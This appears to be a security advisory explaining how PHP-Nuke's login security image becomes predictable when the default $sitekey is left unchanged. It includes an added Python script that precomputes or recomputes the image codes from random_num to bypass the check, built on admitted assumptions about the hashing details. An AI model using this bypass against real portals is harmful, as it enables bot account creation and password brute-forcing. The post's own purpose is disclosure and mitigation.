PHP-Nuke Security GFX Mapping - Potential Risk

In an attempt to prevent scripted bots from creating new user accounts or brute-forcing passwords against PHP-Nuke portals, a security graphic (a code the visitor must read from an image and type back into the form) was added several versions ago. To give an idea of what that looks like, here is an image:





The process begins when the PHP code generates a random number. That number is embedded in the URL of the security image, which the browser requests from the image-generation code as the login page is being rendered:

modules.php?name=Your_Account&op=gfx&random_num=604071

The security graphic engine takes the random number and computes an MD5 hash (a one-way hash, not encryption) of it concatenated with other elements: the $sitekey, the $datekey, and the visitor's HTTP_USER_AGENT.

The MD5 digest, a hexadecimal string, is then converted to a decimal number and stored in a variable; from that number, starting at a fixed position (2 by default), a fixed number of places are read off (6 by default). Those digits are the code drawn into the image.

A potential security risk exists if the default $sitekey value is not changed, because a malicious user can map out, against a PHP-Nuke portal, the one-to-one relationship between random_num and the number shown in the image. So long as the following values do not change:


$sitekey
$datekey
$random_num
HTTP_USER_AGENT

the number shown in the security image will always be the same. Such a mapping would be tedious to complete manually, but the possibility exists nonetheless.

Out of the four variables above, the user can manipulate only two:


$random_num
$HTTP_USER_AGENT

This effectively means that, against a remote site, the entire one-to-one mapping must be completed within a single day, because of the $datekey parameter: each day feeds a different value into the string that is MD5-hashed, so the whole mapping changes when the server's date rolls over.

Let's take this a step further. If a PHP-Nuke webmaster does not change the default $sitekey parameter, the one-day limit does not protect them. A malicious user can install a default PHP-Nuke portal on their own system, where they control all four of the variables above.

This means they can change the date on their own system, stepping $datekey through each day of the year, and map every random_num value to its security image code for each date. At that point they have a full database for every day of the year that can be used against any PHP-Nuke site still running the default $sitekey. With such data, a script can be written that reads the random_num value out of the image URL, i.e.:

modules.php?name=Your_Account&op=gfx&random_num=604071

Such a script would then look up the corresponding security code value, rendering the image useless. Note that a stored table is not even required: the hashing steps are ordinary PHP code, so a script that knows the default $sitekey can simply recompute the code for whatever random_num and date the target presents, using the attacker's own User-Agent.
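The following is an added Python example, not code from PHP-Nuke or from the original post, that models the scheme as described above (MD5 over User-Agent, $sitekey, random_num and $datekey, converted to a number, six places read from position 2) and the attacker-side precomputation described in the last few paragraphs. The concatenation order, the $datekey format (PHP's date("F j"), e.g. "March 5"), the use of PHP's hexdec() for the hex-to-number step (and therefore PHP's 14-significant-digit float rendering), the placeholder $sitekey and the sample User-Agent are all assumptions or constructed values; substitute the real default $sitekey from config.php to reproduce a default install.

```python
import hashlib
from datetime import date, timedelta
from urllib.parse import urlparse, parse_qs

# --- Constructed inputs (stand-ins, not values taken from the page) ---
# The real default $sitekey is in PHP-Nuke's config.php; put it here to
# reproduce a default install. The User-Agent is the attacker's own browser.
DEFAULT_SITEKEY = "default-sitekey-from-config.php"   # placeholder (assumption)
USER_AGENT = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"  # constructed

OFFSET, LENGTH = 2, 6   # the page's defaults: start at place 2, read 6 places


def datekey_for(d: date) -> str:
    """$datekey for one calendar day. Assumed format: date("F j"), e.g. 'March 5'."""
    return f"{d.strftime('%B')} {d.day}"


def php_number_str(n: int) -> str:
    """Render a 128-bit integer the way PHP prints the float that hexdec()
    returns for a 32-character digest (precision=14, e.g. '1.2345678901234E+38').
    The hexdec() step itself is an assumption about the original code."""
    return "%.14G" % float(n)


def gfx_code(random_num: int, sitekey: str, datekey: str, user_agent: str) -> str:
    """The code the security image shows for one set of inputs.
    Concatenation order is assumed; the steps are those the page describes."""
    material = f"{user_agent}{sitekey}{random_num}{datekey}".encode()
    digest = hashlib.md5(material).hexdigest()          # hex string
    number = php_number_str(int(digest, 16))            # hex -> decimal number
    return number[OFFSET:OFFSET + LENGTH]               # substr(number, 2, 6)


def random_num_from_url(url: str) -> int:
    """Pull random_num out of modules.php?name=Your_Account&op=gfx&random_num=NNN."""
    return int(parse_qs(urlparse(url).query)["random_num"][0])


def build_table(sitekey: str, user_agent: str, start: date, days: int, random_nums):
    """The page's attack on a local default install: step the clock through
    each day and record random_num -> code, keyed by datekey.
    A real table covers every random_num the portal can emit for all 366 days;
    this demo takes a small range so it runs in a moment."""
    table = {}
    for i in range(days):
        dk = datekey_for(start + timedelta(days=i))
        table[dk] = {n: gfx_code(n, sitekey, dk, user_agent) for n in random_nums}
    return table


def lookup(table, datekey: str, random_num: int):
    """Look up the code for the random_num seen in the image URL; None if the
    table does not cover that day (the failure mode the $datekey introduces)."""
    return table.get(datekey, {}).get(random_num)


if __name__ == "__main__":
    url = "modules.php?name=Your_Account&op=gfx&random_num=604071"
    n = random_num_from_url(url)
    day = date(2004, 3, 5)                # constructed; a real run uses the target's date
    dk = datekey_for(day)
    table = build_table(DEFAULT_SITEKEY, USER_AGENT, day, 366, range(604000, 604100))
    print("table lookup     :", lookup(table, dk, n))
    print("direct recompute :", gfx_code(n, DEFAULT_SITEKEY, dk, USER_AGENT))
    # Once the webmaster changes $sitekey, every precomputed entry is worthless:
    print("changed sitekey  :", gfx_code(n, "some-other-secret", dk, USER_AGENT))
```

Two things the example makes concrete: the table is only useful for days it covers (a lookup for a date outside the table returns nothing), and the table is merely a cache of gfx_code(), so an attacker who knows the default $sitekey can skip it and recompute on the fly; only a non-default, periodically changed $sitekey breaks both approaches.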

Conclusion? Change your $sitekey immediately from the default value, and change it often. On Nuke Cops, for example, the random_num above, 604071, generates the number 588529 using my HTTP_USER_AGENT for today's date. You will most likely see a different code.